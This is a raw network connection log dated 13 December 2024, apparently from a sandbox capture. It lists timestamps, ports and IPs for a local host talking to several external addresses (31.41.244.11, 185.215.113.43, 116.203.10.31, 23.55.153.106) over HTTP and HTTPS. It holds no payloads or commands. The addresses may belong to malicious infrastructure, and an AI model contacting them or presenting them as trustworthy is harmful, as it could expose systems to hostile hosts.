Dec 13, 2024 18:53:46.496926069 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.496984959 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.497071028 CET	443	49904	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:46.497138023 CET	49904	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:46.497565985 CET	49904	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:46.497591972 CET	443	49904	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:46.497694969 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.497757912 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.497854948 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.497941017 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.498619080 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.498681068 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.499125957 CET	49904	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:46.499140978 CET	443	49904	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:46.499789000 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.500081062 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.500158072 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.500214100 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.500286102 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.500315905 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.500377893 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.501100063 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.501177073 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.501216888 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.501276970 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.502222061 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.502500057 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.502537012 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.502572060 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.502621889 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.503489017 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.503597975 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.503665924 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.504523039 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.504595995 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.504648924 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.504709959 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.505539894 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.505604029 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.505691051 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.505745888 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.506547928 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.506609917 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.506659985 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.506717920 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.507658958 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.507714033 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.507719994 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.507771015 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.508729935 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.508831024 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.508896112 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.509886980 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.510087013 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.510169029 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.510731936 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.510797024 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.510869026 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.510931969 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.511697054 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.511765003 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.511831999 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.511902094 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.512717009 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.512795925 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.512855053 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.512922049 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.513773918 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.513866901 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.513917923 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.513989925 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.514821053 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.514885902 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.514981031 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.515038967 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.515822887 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.515877962 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.515883923 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.515932083 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.516838074 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.516932964 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.516947985 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.517126083 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.517854929 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.518089056 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.518160105 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.518881083 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.518954992 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.518986940 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.519066095 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.520288944 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.520349026 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.520385981 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.520447969 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.521471977 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.521634102 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.521660089 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.521697044 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.522500038 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.522561073 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.522572041 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.522628069 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.523442984 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.523494959 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.523636103 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.523636103 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.524247885 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.524303913 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.524315119 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.524368048 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.525077105 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.525134087 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.525190115 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.525242090 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.526038885 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.526110888 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.526138067 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.526248932 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.527152061 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.527256966 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.527323961 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.528043032 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.528106928 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.528146029 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.528204918 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.529155016 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.529221058 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.529350042 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.529406071 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.530118942 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.530400038 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.530457973 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.531198978 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.531258106 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.531353951 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.531410933 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.532162905 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.532232046 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.532286882 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.532349110 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.533308983 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.533443928 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.533456087 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.533626080 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.534410954 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.534470081 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.534512043 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.534570932 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.535897017 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.535967112 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.536052942 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.536149025 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.536830902 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.536941051 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.536973953 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.536998034 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.538021088 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.538331032 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.538389921 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.539016962 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.539082050 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.539118052 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.539170027 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.539769888 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.539824963 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.539876938 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.539922953 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.540596962 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.540649891 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.540704012 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.540755987 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.541497946 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.541548967 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.541590929 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.541870117 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.542435884 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.542493105 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.542618036 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.542666912 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.543395996 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.543443918 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.543509007 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.544469118 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.544519901 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.544584036 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.544630051 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.545517921 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.545563936 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.545631886 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.545676947 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.546519041 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.549896002 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.666075945 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.666250944 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.666335106 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.666508913 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.666678905 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.666771889 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.666831970 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.666867018 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.666917086 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.667768955 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.667820930 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.667881012 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.667931080 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.668742895 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.668792009 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.687741995 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.687803030 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.687870979 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.687920094 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.688241005 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.688288927 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.688335896 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.688383102 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.689027071 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.689074993 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.689157963 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.689204931 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.690018892 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.690085888 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.690110922 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.690157890 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.691528082 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.691581011 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.691616058 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.691663027 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.692051888 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.692101002 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.692262888 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.692310095 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.693056107 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.693104029 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.693177938 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.693221092 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.694071054 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.694118977 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.694447041 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.694495916 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.694509983 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.694557905 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.696295977 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.696307898 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.696343899 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.696367979 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.696435928 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.696482897 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.696564913 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.696614027 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.697511911 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.697561026 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.697591066 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.697637081 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.698498964 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:46.698549032 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:46.862443924 CET	443	49902	23.55.153.106	192.168.2.7
Dec 13, 2024 18:53:46.862474918 CET	443	49902	23.55.153.106	192.168.2.7
Dec 13, 2024 18:53:46.862530947 CET	443	49902	23.55.153.106	192.168.2.7
Dec 13, 2024 18:53:46.862667084 CET	49902	443	192.168.2.7	23.55.153.106
Dec 13, 2024 18:53:46.862689018 CET	443	49902	23.55.153.106	192.168.2.7
Dec 13, 2024 18:53:46.862750053 CET	49902	443	192.168.2.7	23.55.153.106
Dec 13, 2024 18:53:46.951025963 CET	443	49902	23.55.153.106	192.168.2.7
Dec 13, 2024 18:53:46.951091051 CET	443	49902	23.55.153.106	192.168.2.7
Dec 13, 2024 18:53:46.951126099 CET	49902	443	192.168.2.7	23.55.153.106
Dec 13, 2024 18:53:46.951141119 CET	443	49902	23.55.153.106	192.168.2.7
Dec 13, 2024 18:53:46.951195002 CET	49902	443	192.168.2.7	23.55.153.106
Dec 13, 2024 18:53:46.958442926 CET	443	49902	23.55.153.106	192.168.2.7
Dec 13, 2024 18:53:46.958537102 CET	443	49902	23.55.153.106	192.168.2.7
Dec 13, 2024 18:53:46.958652020 CET	49902	443	192.168.2.7	23.55.153.106
Dec 13, 2024 18:53:46.958709955 CET	443	49902	23.55.153.106	192.168.2.7
Dec 13, 2024 18:53:46.958740950 CET	49902	443	192.168.2.7	23.55.153.106
Dec 13, 2024 18:53:46.958740950 CET	49902	443	192.168.2.7	23.55.153.106
Dec 13, 2024 18:53:46.958753109 CET	443	49902	23.55.153.106	192.168.2.7
Dec 13, 2024 18:53:46.958770037 CET	443	49902	23.55.153.106	192.168.2.7
Dec 13, 2024 18:53:47.396950960 CET	443	49904	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:47.397037029 CET	443	49904	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:47.397038937 CET	49904	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:47.397113085 CET	49904	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:47.421509981 CET	49904	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:47.421554089 CET	443	49904	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:48.567363977 CET	49913	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:48.567398071 CET	443	49913	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:48.567480087 CET	49913	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:48.583127022 CET	49913	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:48.583144903 CET	443	49913	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:49.119467974 CET	49890	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:49.119726896 CET	49915	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:49.239372015 CET	80	49915	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:49.239465952 CET	49915	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:49.239483118 CET	80	49890	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:49.239527941 CET	49890	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:49.239614010 CET	49915	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:49.359354019 CET	80	49915	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:49.987927914 CET	443	49913	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:49.987998009 CET	49913	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:49.988406897 CET	49913	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:49.988420963 CET	443	49913	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:49.989844084 CET	49913	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:49.989854097 CET	443	49913	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:50.584038019 CET	80	49915	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:50.584093094 CET	49915	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:50.706669092 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:50.706927061 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:50.827202082 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:50.827222109 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:50.827279091 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:50.827325106 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:50.884376049 CET	443	49913	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:50.884401083 CET	443	49913	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:50.884447098 CET	49913	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:50.884473085 CET	443	49913	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:50.884480953 CET	49913	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:50.884521961 CET	49913	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:51.321834087 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:51.450774908 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:51.467278004 CET	49913	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:51.467308998 CET	443	49913	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:52.067265034 CET	49922	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:52.067338943 CET	443	49922	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:52.067404032 CET	49922	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:52.090354919 CET	49922	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:52.090388060 CET	443	49922	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:52.164398909 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.164443016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.164475918 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.164541006 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.164704084 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.164757013 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.164760113 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.164813042 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.164814949 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.164866924 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.165062904 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.165098906 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.165117025 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.165139914 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.165154934 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.165155888 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.165193081 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.165196896 CET	49917	80	192.168.2.7	31.41.244.11
